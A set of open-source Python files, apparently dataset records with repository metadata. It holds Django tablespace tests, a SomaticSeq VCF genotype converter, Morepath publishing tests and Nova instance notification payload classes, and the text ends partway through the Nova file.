yephper/django | tests/model_options/test_tablespaces.py | 1 | 5517 | from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.db import connection
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from .models.tablespaces import (
Article, ArticleRef, Authors, Reviewers, Scientist, ScientistRef,
)
def sql_for_table(model):
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(model)
return editor.collected_sql[0]
def sql_for_index(model):
return '\n'.join(connection.schema_editor()._model_indexes_sql(model))
# We can't test the DEFAULT_TABLESPACE and DEFAULT_INDEX_TABLESPACE settings
# because they're evaluated when the model class is defined. As a consequence,
# @override_settings doesn't work, and the tests depend
class TablespacesTests(TestCase):
def setUp(self):
# The unmanaged models need to be removed after the test in order to
# prevent bad interactions with the flush operation in other tests.
self._old_models = apps.app_configs['model_options'].models.copy()
for model in Article, Authors, Reviewers, Scientist:
model._meta.managed = True
def tearDown(self):
for model in Article, Authors, Reviewers, Scientist:
model._meta.managed = False
apps.app_configs['model_options'].models = self._old_models
apps.all_models['model_options'] = self._old_models
apps.clear_cache()
def assertNumContains(self, haystack, needle, count):
real_count = haystack.count(needle)
self.assertEqual(real_count, count, "Found %d instances of '%s', "
"expected %d" % (real_count, needle, count))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_model(self):
sql = sql_for_table(Scientist).lower()
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the index on the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
@skipIfDBFeature('supports_tablespaces')
def test_tablespace_ignored_for_model(self):
# No tablespace-related SQL
self.assertEqual(sql_for_table(Scientist),
sql_for_table(ScientistRef))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_indexed_field(self):
sql = sql_for_table(Article).lower()
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key + 1 for the index on code
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 2)
else:
# 1 for the table + 1 for the primary key + 1 for the index on code
self.assertNumContains(sql, 'tbl_tbsp', 3)
# 1 for the index on reference
self.assertNumContains(sql, 'idx_tbsp', 1)
@skipIfDBFeature('supports_tablespaces')
def test_tablespace_ignored_for_indexed_field(self):
# No tablespace-related SQL
self.assertEqual(sql_for_table(Article),
sql_for_table(ArticleRef))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_many_to_many_field(self):
sql = sql_for_table(Authors).lower()
# The join table of the ManyToManyField goes to the model's tablespace,
# and its indexes too, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_index(Authors).lower()
# The ManyToManyField declares no db_tablespace, its indexes go to
# the model's tablespace, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 2)
else:
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_table(Reviewers).lower()
# The join table of the ManyToManyField goes to the model's tablespace,
# and its indexes too, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_index(Reviewers).lower()
# The ManyToManyField declares db_tablespace, its indexes go there.
self.assertNumContains(sql, 'tbl_tbsp', 0)
self.assertNumContains(sql, 'idx_tbsp', 2)
| bsd-3-clause | -7,410,635,361,430,300,000 | 41.101563 | 79 | 0.636759 | false |
bioinform/somaticseq | somaticseq/vcfModifier/modify_JointSNVMix2.py | 1 | 3347 | #!/usr/bin/env python3
import argparse
import somaticseq.genomicFileHandler.genomic_file_handlers as genome
def run():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Variant Call Type, i.e., snp or indel
parser.add_argument('-infile', '--input-vcf', type=str, help='Input VCF file', required=True)
parser.add_argument('-outfile', '--output-vcf', type=str, help='Output VCF file', required=True)
# Parse the arguments:
args = parser.parse_args()
infile = args.input_vcf
outfile = args.output_vcf
return infile, outfile
def convert(infile, outfile):
idx_chrom,idx_pos,idx_id,idx_ref,idx_alt,idx_qual,idx_filter,idx_info,idx_format,idx_SM1,idx_SM2 = 0,1,2,3,4,5,6,7,8,9,10
with genome.open_textfile(infile) as vcf, open(outfile, 'w') as vcfout:
line_i = vcf.readline().rstrip()
# VCF header
while line_i.startswith('#'):
if line_i.startswith('##FORMAT=<ID=AD,'):
line_i = '##FORMAT=<ID=AD,Number=.,Type=Integer,Description="Allelic depths for the ref and alt alleles in the order listed">'
vcfout.write( line_i + '\n')
line_i = vcf.readline().rstrip()
while line_i:
item = line_i.split('\t')
format_items = item[idx_format].split(':')
if 'AD' in format_items and 'RD' in format_items:
# NORMAL
idx_ad = format_items.index('AD')
idx_rd = format_items.index('RD')
format_items.pop(idx_rd)
item_normal = item[idx_SM1].split(':')
normal_ad = int(item_normal[idx_ad])
normal_rd = int(item_normal[idx_rd])
try:
vaf = normal_ad / (normal_ad + normal_rd)
except ZeroDivisionError:
vaf = 0
if vaf > 0.8:
normal_gt = '1/1'
elif vaf > 0.25:
normal_gt = '0/1'
else:
normal_gt = '0/0'
item_normal[idx_ad] = '{},{}'.format( item_normal[idx_rd] , item_normal[idx_ad] )
item_normal.pop(idx_rd)
item_normal = [normal_gt] + item_normal
# TUMOR
item_tumor = item[idx_SM2].split(':')
tumor_ad = int(item_tumor[idx_ad])
tumor_rd = int(item_tumor[idx_rd])
try:
vaf = tumor_ad / (tumor_ad + tumor_rd)
except ZeroDivisionError:
vaf = 0
if vaf > 0.8:
tumor_gt = '1/1'
else:
tumor_gt = '0/1'
item_tumor[idx_ad] = '{},{}'.format( item_tumor[idx_rd] , item_tumor[idx_ad] )
item_tumor.pop(idx_rd)
item_tumor = [tumor_gt] + item_tumor
# Rewrite
item[idx_format] = 'GT:' + ':'.join(format_items)
item[idx_SM1] = ':'.join(item_normal)
item[idx_SM2] = ':'.join(item_tumor)
line_i = '\t'.join(item)
vcfout.write(line_i+'\n')
line_i = vcf.readline().rstrip()
if __name__ == '__main__':
infile, outfile = run()
convert(infile, outfile)
| bsd-2-clause | 4,254,031,095,837,364,000 | 29.990741 | 142 | 0.501942 | false |
faassen/morepath | morepath/tests/test_publish.py | 1 | 8911 | import dectate
import morepath
from morepath.app import App
from morepath.publish import publish, resolve_response
from morepath.request import Response
from morepath.view import render_json, render_html
from webob.exc import HTTPNotFound, HTTPBadRequest, HTTPFound, HTTPOk
import webob
from webtest import TestApp as Client
import pytest
def get_environ(path, **kw):
return webob.Request.blank(path, **kw).environ
class Model(object):
pass
def test_view():
class app(App):
pass
dectate.commit(app)
def view(self, request):
return "View!"
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
def test_predicates():
class app(App):
pass
dectate.commit(app)
def view(self, request):
return "all"
def post_view(self, request):
return "post"
view_registry = app.config.view_registry
view_registry.register_view(dict(model=Model), view)
view_registry.register_view(
dict(model=Model, request_method='POST'),
post_view)
model = Model()
assert resolve_response(
model, app().request(get_environ(path=''))).body == b'all'
assert (
resolve_response(
model, app().request(get_environ(path='', method='POST'))).body ==
b'post')
def test_notfound():
class app(App):
pass
dectate.commit(app)
request = app().request(get_environ(path=''))
with pytest.raises(HTTPNotFound):
publish(request)
def test_notfound_with_predicates():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return "view"
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
request = app().request(get_environ(''))
request.unconsumed = ['foo']
with pytest.raises(HTTPNotFound):
resolve_response(model, request)
def test_response_returned():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return Response('Hello world!')
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
response = resolve_response(model, app().request(get_environ(path='')))
assert response.body == b'Hello world!'
def test_request_view():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return {'hey': 'hey'}
app.config.view_registry.register_view(
dict(model=Model), view,
render=render_json)
request = app().request(get_environ(path=''))
model = Model()
response = resolve_response(model, request)
# when we get the response, the json will be rendered
assert response.body == b'{"hey": "hey"}'
assert response.content_type == 'application/json'
# but we get the original json out when we access the view
assert request.view(model) == {'hey': 'hey'}
def test_request_view_with_predicates():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return {'hey': 'hey'}
app.config.view_registry.register_view(
dict(model=Model, name='foo'), view,
render=render_json)
request = app().request(get_environ(path=''))
model = Model()
# since the name is set to foo, we get nothing here
assert request.view(model) is None
# we have to pass the name predicate ourselves
assert request.view(model, name='foo') == {'hey': 'hey'}
# the predicate information in the request is ignored when we do a
# manual view lookup using request.view
request = app().request(get_environ(path='foo'))
assert request.view(model) is None
def test_render_html():
class app(App):
pass
dectate.commit(app)
def view(self, request):
return '<p>Hello world!</p>'
app.config.view_registry.register_view(
dict(model=Model), view,
render=render_html)
request = app().request(get_environ(path=''))
model = Model()
response = resolve_response(model, request)
assert response.body == b'<p>Hello world!</p>'
assert response.content_type == 'text/html'
def test_view_raises_http_error():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
raise HTTPBadRequest()
path_registry = app.config.path_registry
path_registry.register_path(
Model, 'foo', None, None, None, None, False, Model)
app.config.view_registry.register_view(dict(model=Model), view)
request = app().request(get_environ(path='foo'))
with pytest.raises(HTTPBadRequest):
publish(request)
def test_view_after():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
return "View!"
app.config.view_registry.register_view(
dict(model=Model),
view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
assert result.headers.get('Foo') == 'FOO'
def test_view_after_redirect():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
return morepath.redirect('http://example.org')
app.config.view_registry.register_view(
dict(model=Model),
view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.status_code == 302
assert result.headers.get('Location') == 'http://example.org'
assert result.headers.get('Foo') == 'FOO'
def test_conditional_view_after():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
if False:
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
return "View!"
app.config.view_registry.register_view(
dict(model=Model), view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
assert result.headers.get('Foo') is None
def test_view_after_non_decorator():
class app(morepath.App):
pass
dectate.commit(app)
def set_header(response):
response.headers.add('Foo', 'FOO')
def view(self, request):
request.after(set_header)
return "View!"
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
assert result.headers.get('Foo') == 'FOO'
def test_view_after_doesnt_apply_to_exception():
class App(morepath.App):
pass
class Root(object):
pass
@App.path(model=Root, path='')
def get_root():
return Root()
@App.view(model=Root)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
raise HTTPNotFound()
dectate.commit(App)
c = Client(App())
response = c.get('/', status=404)
assert response.headers.get('Foo') is None
@pytest.mark.parametrize('status_code,exception_class', [
(200, HTTPOk),
(302, HTTPFound)
])
def test_view_after_applies_to_some_exceptions(status_code, exception_class):
class App(morepath.App):
pass
class Root(object):
pass
@App.path(model=Root, path='')
def get_root():
return Root()
@App.view(model=Root)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
raise exception_class()
dectate.commit(App)
c = Client(App())
response = c.get('/', status=status_code)
assert response.headers.get('Foo') == 'FOO'
def test_view_after_doesnt_apply_to_exception_view():
class App(morepath.App):
pass
class Root(object):
pass
class MyException(Exception):
pass
@App.path(model=Root, path='')
def get_root():
return Root()
@App.view(model=Root)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
raise MyException()
@App.view(model=MyException)
def exc_view(self, request):
return "My exception"
dectate.commit(App)
c = Client(App())
response = c.get('/')
assert response.body == b'My exception'
assert response.headers.get('Foo') is None
| bsd-3-clause | -5,141,796,688,623,529,000 | 22.574074 | 78 | 0.622265 | false |
phenoxim/nova | nova/notifications/objects/instance.py | 1 | 25085 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import nova.conf
from nova.notifications.objects import base
from nova.notifications.objects import flavor as flavor_payload
from nova.notifications.objects import keypair as keypair_payload
from nova.objects import base as nova_base
from nova.objects import fields
CONF = nova.conf.CONF
@nova_base.NovaObjectRegistry.register_notification
class InstancePayload(base.NotificationPayloadBase):
SCHEMA = {
'uuid': ('instance', 'uuid'),
'user_id': ('instance', 'user_id'),
'tenant_id': ('instance', 'project_id'),
'reservation_id': ('instance', 'reservation_id'),
'display_name': ('instance', 'display_name'),
'display_description': ('instance', 'display_description'),
'host_name': ('instance', 'hostname'),
'host': ('instance', 'host'),
'node': ('instance', 'node'),
'os_type': ('instance', 'os_type'),
'architecture': ('instance', 'architecture'),
'availability_zone': ('instance', 'availability_zone'),
'image_uuid': ('instance', 'image_ref'),
'key_name': ('instance', 'key_name'),
'kernel_id': ('instance', 'kernel_id'),
'ramdisk_id': ('instance', 'ramdisk_id'),
'created_at': ('instance', 'created_at'),
'launched_at': ('instance', 'launched_at'),
'terminated_at': ('instance', 'terminated_at'),
'deleted_at': ('instance', 'deleted_at'),
'updated_at': ('instance', 'updated_at'),
'state': ('instance', 'vm_state'),
'power_state': ('instance', 'power_state'),
'task_state': ('instance', 'task_state'),
'progress': ('instance', 'progress'),
'metadata': ('instance', 'metadata'),
'locked': ('instance', 'locked'),
'auto_disk_config': ('instance', 'auto_disk_config')
}
# Version 1.0: Initial version
# Version 1.1: add locked and display_description field
# Version 1.2: Add auto_disk_config field
# Version 1.3: Add key_name field
# Version 1.4: Add BDM related data
# Version 1.5: Add updated_at field
# Version 1.6: Add request_id field
VERSION = '1.6'
fields = {
'uuid': fields.UUIDField(),
'user_id': fields.StringField(nullable=True),
'tenant_id': fields.StringField(nullable=True),
'reservation_id': fields.StringField(nullable=True),
'display_name': fields.StringField(nullable=True),
'display_description': fields.StringField(nullable=True),
'host_name': fields.StringField(nullable=True),
'host': fields.StringField(nullable=True),
'node': fields.StringField(nullable=True),
'os_type': fields.StringField(nullable=True),
'architecture': fields.StringField(nullable=True),
'availability_zone': fields.StringField(nullable=True),
'flavor': fields.ObjectField('FlavorPayload'),
'image_uuid': fields.StringField(nullable=True),
'key_name': fields.StringField(nullable=True),
'kernel_id': fields.StringField(nullable=True),
'ramdisk_id': fields.StringField(nullable=True),
'created_at': fields.DateTimeField(nullable=True),
'launched_at': fields.DateTimeField(nullable=True),
'terminated_at': fields.DateTimeField(nullable=True),
'deleted_at': fields.DateTimeField(nullable=True),
'updated_at': fields.DateTimeField(nullable=True),
'state': fields.InstanceStateField(nullable=True),
'power_state': fields.InstancePowerStateField(nullable=True),
'task_state': fields.InstanceTaskStateField(nullable=True),
'progress': fields.IntegerField(nullable=True),
'ip_addresses': fields.ListOfObjectsField('IpPayload'),
'block_devices': fields.ListOfObjectsField('BlockDevicePayload',
nullable=True),
'metadata': fields.DictOfStringsField(),
'locked': fields.BooleanField(),
'auto_disk_config': fields.DiskConfigField(),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, bdms=None):
super(InstancePayload, self).__init__()
network_info = instance.get_network_info()
self.ip_addresses = IpPayload.from_network_info(network_info)
self.flavor = flavor_payload.FlavorPayload(flavor=instance.flavor)
if bdms is not None:
self.block_devices = BlockDevicePayload.from_bdms(bdms)
else:
self.block_devices = BlockDevicePayload.from_instance(instance)
# NOTE(Kevin_Zheng): Don't include request_id for periodic tasks,
# RequestContext for periodic tasks does not include project_id
# and user_id. Consider modify this once periodic tasks got a
# consistent request_id.
self.request_id = context.request_id if (context.project_id and
context.user_id) else None
self.populate_schema(instance=instance)
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionPayload(InstancePayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'fault': fields.ObjectField('ExceptionPayload', nullable=True),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, fault, bdms=None):
super(InstanceActionPayload, self).__init__(context=context,
instance=instance,
bdms=bdms)
self.fault = fault
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added key_name field to InstancePayload
# Version 1.2: Add BDM related data
# Version 1.3: Added updated_at field to InstancePayload
# Version 1.4: Added request_id field to InstancePayload
VERSION = '1.4'
fields = {
'volume_id': fields.UUIDField()
}
def __init__(self, context, instance, fault, volume_id):
super(InstanceActionVolumePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.volume_id = volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'old_volume_id': fields.UUIDField(),
'new_volume_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, old_volume_id, new_volume_id):
super(InstanceActionVolumeSwapPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.old_volume_id = old_volume_id
self.new_volume_id = new_volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreatePayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.2: Initial version. It starts at 1.2 to match with the version
# of the InstanceActionPayload at the time when this specific
# payload is created as a child of it so that the
# instance.create notification using this new payload does not
# have decreasing version.
# 1.3: Add keypairs field
# 1.4: Add key_name field to InstancePayload
# 1.5: Add BDM related data to InstancePayload
# 1.6: Add tags field to InstanceCreatePayload
# 1.7: Added updated_at field to InstancePayload
# 1.8: Added request_id field to InstancePayload
VERSION = '1.8'
fields = {
'keypairs': fields.ListOfObjectsField('KeypairPayload'),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, fault, bdms):
super(InstanceCreatePayload, self).__init__(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
self.keypairs = [keypair_payload.KeypairPayload(keypair=keypair)
for keypair in instance.keypairs]
self.tags = [instance_tag.tag
for instance_tag in instance.tags]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'new_flavor': fields.ObjectField('FlavorPayload', nullable=True)
}
def __init__(self, context, instance, fault, new_flavor):
super(InstanceActionResizePrepPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.new_flavor = new_flavor
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdatePayload(InstancePayload):
# Version 1.0: Initial version
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added tags field
# Version 1.3: Added auto_disk_config field to InstancePayload
# Version 1.4: Added key_name field to InstancePayload
# Version 1.5: Add BDM related data
# Version 1.6: Added updated_at field to InstancePayload
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'state_update': fields.ObjectField('InstanceStateUpdatePayload'),
'audit_period': fields.ObjectField('AuditPeriodPayload'),
'bandwidth': fields.ListOfObjectsField('BandwidthPayload'),
'old_display_name': fields.StringField(nullable=True),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, state_update, audit_period,
bandwidth, old_display_name):
super(InstanceUpdatePayload, self).__init__(
context=context, instance=instance)
self.state_update = state_update
self.audit_period = audit_period
self.bandwidth = bandwidth
self.old_display_name = old_display_name
self.tags = [instance_tag.tag
for instance_tag in instance.tags.objects]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescuePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'rescue_image_ref': fields.UUIDField(nullable=True)
}
def __init__(self, context, instance, fault, rescue_image_ref):
super(InstanceActionRescuePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.rescue_image_ref = rescue_image_ref
@nova_base.NovaObjectRegistry.register_notification
class IpPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'label': fields.StringField(),
'mac': fields.MACAddressField(),
'meta': fields.DictOfStringsField(),
'port_uuid': fields.UUIDField(nullable=True),
'version': fields.IntegerField(),
'address': fields.IPV4AndV6AddressField(),
'device_name': fields.StringField(nullable=True)
}
def __init__(self, label, mac, meta, port_uuid, version, address,
device_name):
super(IpPayload, self).__init__()
self.label = label
self.mac = mac
self.meta = meta
self.port_uuid = port_uuid
self.version = version
self.address = address
self.device_name = device_name
@classmethod
def from_network_info(cls, network_info):
"""Returns a list of IpPayload object based on the passed
network_info.
"""
ips = []
if network_info is not None:
for vif in network_info:
for ip in vif.fixed_ips():
ips.append(cls(
label=vif["network"]["label"],
mac=vif["address"],
meta=vif["meta"],
port_uuid=vif["id"],
version=ip["version"],
address=ip["address"],
device_name=vif["devname"]))
return ips
@nova_base.NovaObjectRegistry.register_notification
class BandwidthPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'network_name': fields.StringField(),
'in_bytes': fields.IntegerField(),
'out_bytes': fields.IntegerField(),
}
def __init__(self, network_name, in_bytes, out_bytes):
super(BandwidthPayload, self).__init__()
self.network_name = network_name
self.in_bytes = in_bytes
self.out_bytes = out_bytes
@nova_base.NovaObjectRegistry.register_notification
class AuditPeriodPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'audit_period_beginning': fields.DateTimeField(),
'audit_period_ending': fields.DateTimeField(),
}
def __init__(self, audit_period_beginning, audit_period_ending):
super(AuditPeriodPayload, self).__init__()
self.audit_period_beginning = audit_period_beginning
self.audit_period_ending = audit_period_ending
@nova_base.NovaObjectRegistry.register_notification
class BlockDevicePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
SCHEMA = {
'device_name': ('bdm', 'device_name'),
'boot_index': ('bdm', 'boot_index'),
'delete_on_termination': ('bdm', 'delete_on_termination'),
'volume_id': ('bdm', 'volume_id'),
'tag': ('bdm', 'tag')
}
fields = {
'device_name': fields.StringField(nullable=True),
'boot_index': fields.IntegerField(nullable=True),
'delete_on_termination': fields.BooleanField(default=False),
'volume_id': fields.UUIDField(),
'tag': fields.StringField(nullable=True)
}
def __init__(self, bdm):
super(BlockDevicePayload, self).__init__()
self.populate_schema(bdm=bdm)
@classmethod
def from_instance(cls, instance):
"""Returns a list of BlockDevicePayload objects based on the passed
bdms.
"""
if not CONF.notifications.bdms_in_notifications:
return None
instance_bdms = instance.get_bdms()
if instance_bdms is not None:
return cls.from_bdms(instance_bdms)
else:
return []
@classmethod
def from_bdms(cls, bdms):
"""Returns a list of BlockDevicePayload objects based on the passed
BlockDeviceMappingList.
"""
payloads = []
for bdm in bdms:
if bdm.volume_id is not None:
payloads.append(cls(bdm))
return payloads
@nova_base.NovaObjectRegistry.register_notification
class InstanceStateUpdatePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'old_state': fields.StringField(nullable=True),
'state': fields.StringField(nullable=True),
'old_task_state': fields.StringField(nullable=True),
'new_task_state': fields.StringField(nullable=True),
}
def __init__(self, old_state, state, old_task_state, new_task_state):
super(InstanceStateUpdatePayload, self).__init__()
self.old_state = old_state
self.state = state
self.old_task_state = old_task_state
self.new_task_state = new_task_state
@base.notification_sample('instance-delete-start.json')
@base.notification_sample('instance-delete-end.json')
@base.notification_sample('instance-pause-start.json')
@base.notification_sample('instance-pause-end.json')
@base.notification_sample('instance-unpause-start.json')
@base.notification_sample('instance-unpause-end.json')
@base.notification_sample('instance-resize-start.json')
@base.notification_sample('instance-resize-end.json')
@base.notification_sample('instance-resize-error.json')
@base.notification_sample('instance-suspend-start.json')
@base.notification_sample('instance-suspend-end.json')
@base.notification_sample('instance-power_on-start.json')
@base.notification_sample('instance-power_on-end.json')
@base.notification_sample('instance-power_off-start.json')
@base.notification_sample('instance-power_off-end.json')
@base.notification_sample('instance-reboot-start.json')
@base.notification_sample('instance-reboot-end.json')
@base.notification_sample('instance-reboot-error.json')
@base.notification_sample('instance-shutdown-start.json')
@base.notification_sample('instance-shutdown-end.json')
@base.notification_sample('instance-interface_attach-start.json')
@base.notification_sample('instance-interface_attach-end.json')
@base.notification_sample('instance-interface_attach-error.json')
@base.notification_sample('instance-shelve-start.json')
@base.notification_sample('instance-shelve-end.json')
@base.notification_sample('instance-resume-start.json')
@base.notification_sample('instance-resume-end.json')
@base.notification_sample('instance-restore-start.json')
@base.notification_sample('instance-restore-end.json')
@base.notification_sample('instance-evacuate.json')
@base.notification_sample('instance-resize_finish-start.json')
@base.notification_sample('instance-resize_finish-end.json')
@base.notification_sample('instance-live_migration_pre-start.json')
@base.notification_sample('instance-live_migration_pre-end.json')
@base.notification_sample('instance-live_migration_abort-start.json')
@base.notification_sample('instance-live_migration_abort-end.json')
# @base.notification_sample('instance-live_migration_post-start.json')
# @base.notification_sample('instance-live_migration_post-end.json')
@base.notification_sample('instance-live_migration_post_dest-start.json')
@base.notification_sample('instance-live_migration_post_dest-end.json')
@base.notification_sample('instance-live_migration_rollback-start.json')
@base.notification_sample('instance-live_migration_rollback-end.json')
# @base.notification_sample('instance-live_migration_rollback_dest-start.json')
# @base.notification_sample('instance-live_migration_rollback_dest-end.json')
@base.notification_sample('instance-rebuild-start.json')
@base.notification_sample('instance-rebuild-end.json')
@base.notification_sample('instance-rebuild-error.json')
@base.notification_sample('instance-interface_detach-start.json')
@base.notification_sample('instance-interface_detach-end.json')
@base.notification_sample('instance-resize_confirm-start.json')
@base.notification_sample('instance-resize_confirm-end.json')
@base.notification_sample('instance-resize_revert-start.json')
@base.notification_sample('instance-resize_revert-end.json')
@base.notification_sample('instance-shelve_offload-start.json')
@base.notification_sample('instance-shelve_offload-end.json')
@base.notification_sample('instance-soft_delete-start.json')
@base.notification_sample('instance-soft_delete-end.json')
@base.notification_sample('instance-trigger_crash_dump-start.json')
@base.notification_sample('instance-trigger_crash_dump-end.json')
@base.notification_sample('instance-unrescue-start.json')
@base.notification_sample('instance-unrescue-end.json')
@base.notification_sample('instance-unshelve-start.json')
@base.notification_sample('instance-unshelve-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionPayload')
}
@base.notification_sample('instance-update.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceUpdatePayload')
}
@base.notification_sample('instance-volume_swap-start.json')
@base.notification_sample('instance-volume_swap-end.json')
@base.notification_sample('instance-volume_swap-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumeSwapPayload')
}
@base.notification_sample('instance-volume_attach-start.json')
@base.notification_sample('instance-volume_attach-end.json')
@base.notification_sample('instance-volume_attach-error.json')
@base.notification_sample('instance-volume_detach-start.json')
@base.notification_sample('instance-volume_detach-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumePayload')
}
@base.notification_sample('instance-create-start.json')
@base.notification_sample('instance-create-end.json')
@base.notification_sample('instance-create-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceCreatePayload')
}
@base.notification_sample('instance-resize_prep-start.json')
@base.notification_sample('instance-resize_prep-end.json')
@nova_base.NovaObjectRegistry.register_notification
